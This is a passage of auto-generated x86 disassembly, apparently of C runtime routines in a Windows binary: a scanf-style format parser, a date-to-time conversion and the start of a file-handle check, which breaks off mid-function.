loc_41593A: ; CODE XREF: sub_41578D+1A1�j
; sub_41578D+1A5�j
mov [ebp+var_5], 1
loc_41593E: ; CODE XREF: sub_41578D+19B�j
; sub_41578D+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_415977
cmp esi, 63h
jz short loc_415968
cmp esi, 7Bh
jz short loc_415968
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_41621A
pop ecx
jmp short loc_415973
; ---------------------------------------------------------------------------
loc_415968: ; CODE XREF: sub_41578D+1C5�j
; sub_41578D+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_4161E9
loc_415973: ; CODE XREF: sub_41578D+1D9�j
pop ecx
mov [ebp+var_14], eax
loc_415977: ; CODE XREF: sub_41578D+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_415987
cmp [ebp+var_C], eax
jz loc_416163
loc_415987: ; CODE XREF: sub_41578D+1EF�j
cmp esi, 6Fh
jg loc_415BEE
jz loc_415EA0
cmp esi, 63h
jz loc_415BCB
cmp esi, 64h
jz loc_415EA0
jle loc_415C18
cmp esi, 67h
jle short loc_4159EB
cmp esi, 69h
jz short loc_4159D3
cmp esi, 6Eh
jnz loc_415C18
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_4160CE
jmp loc_4160F4
; ---------------------------------------------------------------------------
loc_4159D3: ; CODE XREF: sub_41578D+229�j
push 64h
pop esi
loc_4159D6: ; CODE XREF: sub_41578D+480�j
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz loc_415C60
mov [ebp+var_17], 1
jmp loc_415C65
; ---------------------------------------------------------------------------
loc_4159EB: ; CODE XREF: sub_41578D+224�j
mov ebx, [ebp+var_14]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_415A07
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_415A0C
; ---------------------------------------------------------------------------
loc_415A07: ; CODE XREF: sub_41578D+26A�j
cmp ebx, 2Bh
jnz short loc_415A23
loc_415A0C: ; CODE XREF: sub_41578D+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_4161E9
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_415A26
; ---------------------------------------------------------------------------
loc_415A23: ; CODE XREF: sub_41578D+27D�j
mov edi, [ebp+arg_0]
loc_415A26: ; CODE XREF: sub_41578D+294�j
cmp [ebp+var_20], 0
jz short loc_415A35
cmp [ebp+var_C], 15Dh
jle short loc_415A3C
loc_415A35: ; CODE XREF: sub_41578D+29D�j
mov [ebp+var_C], 15Dh
loc_415A3C: ; CODE XREF: sub_41578D+2A6�j
; sub_41578D+2F2�j
cmp ds:dword_42E39C, 1
jle short loc_415A51
push 4
push ebx
call sub_413446
pop ecx
pop ecx
jmp short loc_415A5C
; ---------------------------------------------------------------------------
loc_415A51: ; CODE XREF: sub_41578D+2B6�j
mov eax, ds:dword_42E190
mov al, [eax+ebx*2]
and eax, 4
loc_415A5C: ; CODE XREF: sub_41578D+2C2�j
test eax, eax
jz short loc_415A81
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_415A81
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_4161E9
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_415A3C
; ---------------------------------------------------------------------------
loc_415A81: ; CODE XREF: sub_41578D+2D1�j
; sub_41578D+2DB�j
cmp ds:byte_42E3A0, bl
jnz short loc_415AEF
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_415AEF
inc [ebp+var_4]
push edi
call sub_4161E9
mov ebx, eax
mov al, ds:byte_42E3A0
mov [esi], al
pop ecx
mov [ebp+var_14], ebx
inc esi
loc_415AAA: ; CODE XREF: sub_41578D+360�j
cmp ds:dword_42E39C, 1
jle short loc_415ABF
push 4
push ebx
call sub_413446
pop ecx
pop ecx
jmp short loc_415ACA
; ---------------------------------------------------------------------------
loc_415ABF: ; CODE XREF: sub_41578D+324�j
mov eax, ds:dword_42E190
mov al, [eax+ebx*2]
and eax, 4
loc_415ACA: ; CODE XREF: sub_41578D+330�j
test eax, eax
jz short loc_415AEF
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_415AEF
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_4161E9
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_415AAA
; ---------------------------------------------------------------------------
loc_415AEF: ; CODE XREF: sub_41578D+2FA�j
; sub_41578D+304�j ...
cmp [ebp+var_1C], 0
jz loc_415B87
cmp ebx, 65h
jz short loc_415B07
cmp ebx, 45h
jnz loc_415B87
loc_415B07: ; CODE XREF: sub_41578D+36F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_415B87
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_4161E9
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov [ebp+var_14], ebx
jnz short loc_415B2E
mov [esi], al
inc esi
jmp short loc_415B33
; ---------------------------------------------------------------------------
loc_415B2E: ; CODE XREF: sub_41578D+39A�j
cmp ebx, 2Bh
jnz short loc_415B51
loc_415B33: ; CODE XREF: sub_41578D+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_415B42
and [ebp+var_C], eax
jmp short loc_415B51
; ---------------------------------------------------------------------------
loc_415B42: ; CODE XREF: sub_41578D+3AE�j
; sub_41578D+3F8�j
inc [ebp+var_4]
push edi
call sub_4161E9
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_415B51: ; CODE XREF: sub_41578D+3A4�j
; sub_41578D+3B3�j
cmp ds:dword_42E39C, 1
jle short loc_415B66
push 4
push ebx
call sub_413446
pop ecx
pop ecx
jmp short loc_415B71
; ---------------------------------------------------------------------------
loc_415B66: ; CODE XREF: sub_41578D+3CB�j
mov eax, ds:dword_42E190
mov al, [eax+ebx*2]
and eax, 4
loc_415B71: ; CODE XREF: sub_41578D+3D7�j
test eax, eax
jz short loc_415B87
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_415B87
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_415B42
; ---------------------------------------------------------------------------
loc_415B87: ; CODE XREF: sub_41578D+366�j
; sub_41578D+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_416203
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_416193
cmp [ebp+var_E], 0
jnz loc_4160F4
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call ds:dword_42E4D0
add esp, 0Ch
jmp loc_4160F4
; ---------------------------------------------------------------------------
loc_415BCB: ; CODE XREF: sub_41578D+20C�j
cmp [ebp+var_20], eax
jnz short loc_415BDA
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_415BDA: ; CODE XREF: sub_41578D+441�j
cmp [ebp+var_5], 0
jle short loc_415BE4
mov [ebp+var_16], 1
loc_415BE4: ; CODE XREF: sub_41578D+451�j
mov edi, offset dword_42E500
jmp loc_415CF9
; ---------------------------------------------------------------------------
loc_415BEE: ; CODE XREF: sub_41578D+1FD�j
mov eax, esi
sub eax, 70h
jz loc_415E9C
sub eax, 3
jz loc_415CEA
dec eax
dec eax
jz loc_415EA0
sub eax, 3
jz loc_4159D6
sub eax, 3
jz short loc_415C3C
loc_415C18: ; CODE XREF: sub_41578D+21B�j
; sub_41578D+22E�j
movzx eax, byte ptr [ebx]
cmp eax, [ebp+var_14]
jnz loc_416163
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_4160F4
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_4160F4
; ---------------------------------------------------------------------------
loc_415C3C: ; CODE XREF: sub_41578D+489�j
cmp [ebp+var_5], 0
jle short loc_415C46
mov [ebp+var_16], 1
loc_415C46: ; CODE XREF: sub_41578D+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_415CFD
mov eax, edi
lea edi, [eax+1]
jmp loc_415CF9
; ---------------------------------------------------------------------------
loc_415C60: ; CODE XREF: sub_41578D+24F�j
cmp ebx, 2Bh
jnz short loc_415C87
loc_415C65: ; CODE XREF: sub_41578D+259�j
dec [ebp+var_C]
jnz short loc_415C76
cmp [ebp+var_20], 0
jz short loc_415C76
mov [ebp+var_F], 1
jmp short loc_415C87
; ---------------------------------------------------------------------------
loc_415C76: ; CODE XREF: sub_41578D+4DB�j
; sub_41578D+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_4161E9
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_415C87: ; CODE XREF: sub_41578D+4D6�j
; sub_41578D+4E7�j
cmp ebx, 30h
jnz loc_415ED5
push [ebp+arg_0]
inc [ebp+var_4]
call sub_4161E9
mov ebx, eax
pop ecx
cmp bl, 78h
mov [ebp+var_14], ebx
jz short loc_415CD5
cmp bl, 58h
jz short loc_415CD5
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_415CBF
push 6Fh
loc_415CB9: ; CODE XREF: sub_41578D+55B�j
pop esi
jmp loc_415ED5
; ---------------------------------------------------------------------------
loc_415CBF: ; CODE XREF: sub_41578D+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_416203
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_415ED2
; ---------------------------------------------------------------------------
loc_415CD5: ; CODE XREF: sub_41578D+517�j
; sub_41578D+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_4161E9
pop ecx
mov ebx, eax
mov [ebp+var_14], ebx
push 78h
jmp short loc_415CB9
; ---------------------------------------------------------------------------
loc_415CEA: ; CODE XREF: sub_41578D+46F�j
cmp [ebp+var_5], 0
jle short loc_415CF4
mov [ebp+var_16], 1
loc_415CF4: ; CODE XREF: sub_41578D+561�j
mov edi, offset dword_42E4F8
loc_415CF9: ; CODE XREF: sub_41578D+45C�j
; sub_41578D+4CE�j
or [ebp+var_18], 0FFh
loc_415CFD: ; CODE XREF: sub_41578D+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_410590
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_415D21
cmp byte ptr [edi], 5Dh
jnz short loc_415D21
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_415D24
; ---------------------------------------------------------------------------
loc_415D21: ; CODE XREF: sub_41578D+584�j
; sub_41578D+589�j
mov dl, [ebp+var_35]
loc_415D24: ; CODE XREF: sub_41578D+592�j
; sub_41578D+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_415D89
inc edi
cmp al, 2Dh
jnz short loc_415D70
test dl, dl
jz short loc_415D70
mov cl, [edi]
cmp cl, 5Dh
jz short loc_415D70
inc edi
cmp dl, cl
jnb short loc_415D43
mov al, cl
jmp short loc_415D47
; ---------------------------------------------------------------------------
loc_415D43: ; CODE XREF: sub_41578D+5B0�j
mov al, dl
mov dl, cl
loc_415D47: ; CODE XREF: sub_41578D+5B4�j
cmp dl, al
ja short loc_415D6C
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_415D54: ; CODE XREF: sub_41578D+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_415D54
loc_415D6C: ; CODE XREF: sub_41578D+5BC�j
xor dl, dl
jmp short loc_415D24
; ---------------------------------------------------------------------------
loc_415D70: ; CODE XREF: sub_41578D+5A0�j
; sub_41578D+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_415D24
; ---------------------------------------------------------------------------
loc_415D89: ; CODE XREF: sub_41578D+59B�j
cmp byte ptr [edi], 0
jz loc_416193
cmp [ebp+var_3C], 7Bh
jnz short loc_415D9B
mov [ebp+arg_4], edi
loc_415D9B: ; CODE XREF: sub_41578D+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push [ebp+var_14]
mov [ebp+var_30], esi
call sub_416203
pop ecx
pop ecx
loc_415DB2: ; CODE XREF: sub_41578D+6BC�j
; sub_41578D+6C4�j
cmp [ebp+var_20], 0
jz short loc_415DC6
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_415E62
loc_415DC6: ; CODE XREF: sub_41578D+629�j
inc [ebp+var_4]
push edi
call sub_4161E9
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jz short loc_415E56
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_415E56
cmp [ebp+var_E], 0
jnz short loc_415E4E
cmp [ebp+var_16], 0
jz short loc_415E43
mov ecx, ds:dword_42E190
mov [ebp+var_38], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_415E22
inc [ebp+var_4]
push edi
call sub_4161E9
pop ecx
mov [ebp+var_37], al
loc_415E22: ; CODE XREF: sub_41578D+686�j
push ds:dword_42E39C
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3E]
push eax
call sub_4189E7
mov ax, [ebp+var_3E]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_415E46
; ---------------------------------------------------------------------------
loc_415E43: ; CODE XREF: sub_41578D+673�j
mov [esi], al
inc esi
loc_415E46: ; CODE XREF: sub_41578D+6B4�j
mov [ebp+var_2C], esi
jmp loc_415DB2
; ---------------------------------------------------------------------------
loc_415E4E: ; CODE XREF: sub_41578D+66D�j
inc [ebp+var_30]
jmp loc_415DB2
; ---------------------------------------------------------------------------
loc_415E56: ; CODE XREF: sub_41578D+649�j
; sub_41578D+667�j
dec [ebp+var_4]
push edi
push eax
call sub_416203
pop ecx
pop ecx
loc_415E62: ; CODE XREF: sub_41578D+633�j
cmp [ebp+var_30], esi
jz loc_416193
cmp [ebp+var_E], 0
jnz loc_4160F4
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_4160F4
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_415E94
and word ptr [eax], 0
jmp loc_4160F4
; ---------------------------------------------------------------------------
loc_415E94: ; CODE XREF: sub_41578D+6FC�j
and byte ptr [eax], 0
jmp loc_4160F4
; ---------------------------------------------------------------------------
loc_415E9C: ; CODE XREF: sub_41578D+466�j
mov [ebp+var_D], 1
loc_415EA0: ; CODE XREF: sub_41578D+203�j
; sub_41578D+215�j ...
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz short loc_415EAE
mov [ebp+var_17], 1
jmp short loc_415EB3
; ---------------------------------------------------------------------------
loc_415EAE: ; CODE XREF: sub_41578D+719�j
cmp ebx, 2Bh
jnz short loc_415ED5
loc_415EB3: ; CODE XREF: sub_41578D+71F�j
dec [ebp+var_C]
jnz short loc_415EC4
cmp [ebp+var_20], 0
jz short loc_415EC4
mov [ebp+var_F], 1
jmp short loc_415ED5
; ---------------------------------------------------------------------------
loc_415EC4: ; CODE XREF: sub_41578D+729�j
; sub_41578D+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_4161E9
pop ecx
mov ebx, eax
loc_415ED2: ; CODE XREF: sub_41578D+543�j
mov [ebp+var_14], ebx
loc_415ED5: ; CODE XREF: sub_41578D+4FD�j
; sub_41578D+52D�j ...
cmp [ebp+var_30], 0
jz loc_415FEE
cmp [ebp+var_F], 0
jnz loc_415FCC
loc_415EE9: ; CODE XREF: sub_41578D+82C�j
cmp esi, 78h
jnz short loc_415F3D
cmp ds:dword_42E39C, 1
jle short loc_415F06
push 80h
push ebx
call sub_413446
pop ecx
pop ecx
jmp short loc_415F13
; ---------------------------------------------------------------------------
loc_415F06: ; CODE XREF: sub_41578D+768�j
mov eax, ds:dword_42E190
mov al, [eax+ebx*2]
and eax, 80h
loc_415F13: ; CODE XREF: sub_41578D+777�j
test eax, eax
jz loc_415FBE
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_418AE0
push ebx
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_4161B2
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_415F90
; ---------------------------------------------------------------------------
loc_415F3D: ; CODE XREF: sub_41578D+75F�j
cmp ds:dword_42E39C, 1
jle short loc_415F52
push 4
push ebx
call sub_413446
pop ecx
pop ecx
jmp short loc_415F5D
; ---------------------------------------------------------------------------
loc_415F52: ; CODE XREF: sub_41578D+7B7�j
mov eax, ds:dword_42E190
mov al, [eax+ebx*2]
and eax, 4
loc_415F5D: ; CODE XREF: sub_41578D+7C3�j
test eax, eax
jz short loc_415FBE
cmp esi, 6Fh
jnz short loc_415F7B
cmp ebx, 38h
jge short loc_415FBE
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_418AE0
jmp short loc_415F8A
; ---------------------------------------------------------------------------
loc_415F7B: ; CODE XREF: sub_41578D+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_4109C0
loc_415F8A: ; CODE XREF: sub_41578D+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_415F90: ; CODE XREF: sub_41578D+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_415FA8
dec [ebp+var_C]
jz short loc_415FCC
loc_415FA8: ; CODE XREF: sub_41578D+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_4161E9
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_415EE9
; ---------------------------------------------------------------------------
loc_415FBE: ; CODE XREF: sub_41578D+788�j
; sub_41578D+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_416203
pop ecx
pop ecx
loc_415FCC: ; CODE XREF: sub_41578D+756�j
; sub_41578D+819�j
cmp [ebp+var_17], 0
jz loc_4160B2
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_4160B2
; ---------------------------------------------------------------------------
loc_415FEE: ; CODE XREF: sub_41578D+74C�j
cmp [ebp+var_F], 0
jnz loc_4160AA
loc_415FF8: ; CODE XREF: sub_41578D+90A�j
cmp esi, 78h
jz short loc_41603C
cmp esi, 70h
jz short loc_41603C
cmp ds:dword_42E39C, 1
jle short loc_416017
push 4
push ebx
call sub_413446
pop ecx
pop ecx
jmp short loc_416022
; ---------------------------------------------------------------------------
loc_416017: ; CODE XREF: sub_41578D+87C�j
mov eax, ds:dword_42E190
mov al, [eax+ebx*2]
and eax, 4
loc_416022: ; CODE XREF: sub_41578D+888�j
test eax, eax
jz short loc_41609C
cmp esi, 6Fh
jnz short loc_416035
cmp ebx, 38h
jge short loc_41609C
shl edi, 3
jmp short loc_416074
; ---------------------------------------------------------------------------
loc_416035: ; CODE XREF: sub_41578D+89C�j
lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_416074
; ---------------------------------------------------------------------------
loc_41603C: ; CODE XREF: sub_41578D+86E�j
; sub_41578D+873�j
cmp ds:dword_42E39C, 1
jle short loc_416054
push 80h
push ebx
call sub_413446
pop ecx
pop ecx
jmp short loc_416061
; ---------------------------------------------------------------------------
loc_416054: ; CODE XREF: sub_41578D+8B6�j
mov eax, ds:dword_42E190
mov al, [eax+ebx*2]
and eax, 80h
loc_416061: ; CODE XREF: sub_41578D+8C5�j
test eax, eax
jz short loc_41609C
push ebx
shl edi, 4
call sub_4161B2
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_416074: ; CODE XREF: sub_41578D+8A6�j
; sub_41578D+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_416086
dec [ebp+var_C]
jz short loc_4160AA
loc_416086: ; CODE XREF: sub_41578D+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_4161E9
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_415FF8
; ---------------------------------------------------------------------------
loc_41609C: ; CODE XREF: sub_41578D+897�j
; sub_41578D+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_416203
pop ecx
pop ecx
loc_4160AA: ; CODE XREF: sub_41578D+865�j
; sub_41578D+8F7�j
cmp [ebp+var_17], 0
jz short loc_4160B2
neg edi
loc_4160B2: ; CODE XREF: sub_41578D+843�j
; sub_41578D+85C�j ...
cmp esi, 46h
jnz short loc_4160BB
and [ebp+var_1C], 0
loc_4160BB: ; CODE XREF: sub_41578D+928�j
cmp [ebp+var_1C], 0
jz loc_416193
cmp [ebp+var_E], 0
jnz short loc_4160F4
inc [ebp+var_34]
loc_4160CE: ; CODE XREF: sub_41578D+23B�j
cmp [ebp+var_30], 0
jz short loc_4160E4
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_4160F4
; ---------------------------------------------------------------------------
loc_4160E4: ; CODE XREF: sub_41578D+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_4160F1
mov [eax], edi
jmp short loc_4160F4
; ---------------------------------------------------------------------------
loc_4160F1: ; CODE XREF: sub_41578D+95E�j
mov [eax], di
loc_4160F4: ; CODE XREF: sub_41578D+241�j
; sub_41578D+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_416141
; ---------------------------------------------------------------------------
loc_4160FF: ; CODE XREF: sub_41578D+93�j
inc [ebp+var_4]
push edi
call sub_4161E9
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov [ebp+var_14], ebx
mov [ebp+arg_4], esi
jnz short loc_41616E
mov ecx, ds:dword_42E190
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_416141
inc [ebp+var_4]
push edi
call sub_4161E9
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_41617C
dec [ebp+var_4]
loc_416141: ; CODE XREF: sub_41578D+970�j
; sub_41578D+99A�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_416157
cmp byte ptr [esi], 25h
jnz short loc_416199
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_416199
mov esi, eax
loc_416157: ; CODE XREF: sub_41578D+9B8�j
mov al, [esi]
test al, al
jnz loc_4157B7
jmp short loc_416193
; ---------------------------------------------------------------------------
loc_416163: ; CODE XREF: sub_41578D+1F4�j
; sub_41578D+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push [ebp+var_14]
jmp short loc_416173
; ---------------------------------------------------------------------------
loc_41616E: ; CODE XREF: sub_41578D+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_416173: ; CODE XREF: sub_41578D+9DF�j
call sub_416203
pop ecx
pop ecx
jmp short loc_416193
; ---------------------------------------------------------------------------
loc_41617C: ; CODE XREF: sub_41578D+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_416203
dec [ebp+var_4]
push edi
push ebx
call sub_416203
add esp, 10h
loc_416193: ; CODE XREF: sub_41578D+1F�j
; sub_41578D+40A�j ...
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_4161AA
loc_416199: ; CODE XREF: sub_41578D+9BD�j
; sub_41578D+9C6�j
mov eax, [ebp+var_34]
test eax, eax
jnz short loc_4161AD
cmp [ebp+var_15], al
jnz short loc_4161AD
or eax, 0FFFFFFFFh
jmp short loc_4161AD
; ---------------------------------------------------------------------------
loc_4161AA: ; CODE XREF: sub_41578D+A0A�j
mov eax, [ebp+var_34]
loc_4161AD: ; CODE XREF: sub_41578D+A11�j
; sub_41578D+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41578D endp
; =============== S U B R O U T I N E =======================================
sub_4161B2 proc near ; CODE XREF: sub_41578D+7A3�p
; sub_41578D+8DC�p
arg_0 = dword ptr 4
cmp ds:dword_42E39C, 1
push esi
jle short loc_4161CC
mov esi, [esp+4+arg_0]
push 4
push esi
call sub_413446
pop ecx
pop ecx
jmp short loc_4161DB
; ---------------------------------------------------------------------------
loc_4161CC: ; CODE XREF: sub_4161B2+8�j
mov esi, [esp+4+arg_0]
mov eax, ds:dword_42E190
mov al, [eax+esi*2]
and eax, 4
loc_4161DB: ; CODE XREF: sub_4161B2+18�j
test eax, eax
jnz short loc_4161E5
and esi, 0FFFFFFDFh
sub esi, 7
loc_4161E5: ; CODE XREF: sub_4161B2+2B�j
mov eax, esi
pop esi
retn
sub_4161B2 endp
; =============== S U B R O U T I N E =======================================
sub_4161E9 proc near ; CODE XREF: sub_41578D+1E1�p
; sub_41578D+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_4161FB
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_4161FB: ; CODE XREF: sub_4161E9+7�j
push edx
call sub_4164EB
pop ecx
retn
sub_4161E9 endp
; =============== S U B R O U T I N E =======================================
sub_416203 proc near ; CODE XREF: sub_41578D+6B�p
; sub_41578D+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_416219
push [esp+arg_4]
push [esp+4+arg_0]
call sub_418AFF
pop ecx
pop ecx
locret_416219: ; CODE XREF: sub_416203+5�j
retn
sub_416203 endp
; =============== S U B R O U T I N E =======================================
sub_41621A proc near ; CODE XREF: sub_41578D+63�p
; sub_41578D+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_416220: ; CODE XREF: sub_41621A+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_4161E9
mov edi, eax
push edi
call sub_418AAF
pop ecx
test eax, eax
pop ecx
jnz short loc_416220
mov eax, edi
pop edi
pop esi
retn
sub_41621A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41623E proc near ; CODE XREF: sub_411914+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_4162FA
cmp ebx, 8Ah
jg loc_4162FA
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, ds:dword_42EC24[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_41627D
cmp edi, 2
jle short loc_41627D
inc esi
loc_41627D: ; CODE XREF: sub_41623E+37�j
; sub_41623E+3C�j
call sub_418B6D
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, ds:dword_42EB40
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_4162F0
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_4162F6
cmp ds:dword_42EB44, 0
jz short loc_4162F6
lea eax, [ebp+var_24]
push eax
call sub_418DE0
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_4162F6
loc_4162F0: ; CODE XREF: sub_41623E+90�j
add ecx, ds:dword_42EB48
loc_4162F6: ; CODE XREF: sub_41623E+96�j
; sub_41623E+9F�j ...
mov eax, ecx
jmp short loc_4162FD
; ---------------------------------------------------------------------------
loc_4162FA: ; CODE XREF: sub_41623E+13�j
; sub_41623E+1F�j
or eax, 0FFFFFFFFh
loc_4162FD: ; CODE XREF: sub_41623E+BA�j
pop ebx
leave
retn
sub_41623E endp
; =============== S U B R O U T I N E =======================================
sub_416300 proc near ; CODE XREF: sub_4119F0+2A�p
; sub_4192E6+290�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, ds:dword_460C60
jnb loc_41639A
mov eax, edi
mov esi, edi
sar eax, 5
and esi, 1Fh
lea ebx, ds:460B60h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_41639A
push edi
call sub_419252
cmp eax, 0FFFFFFFFh
pop ecx
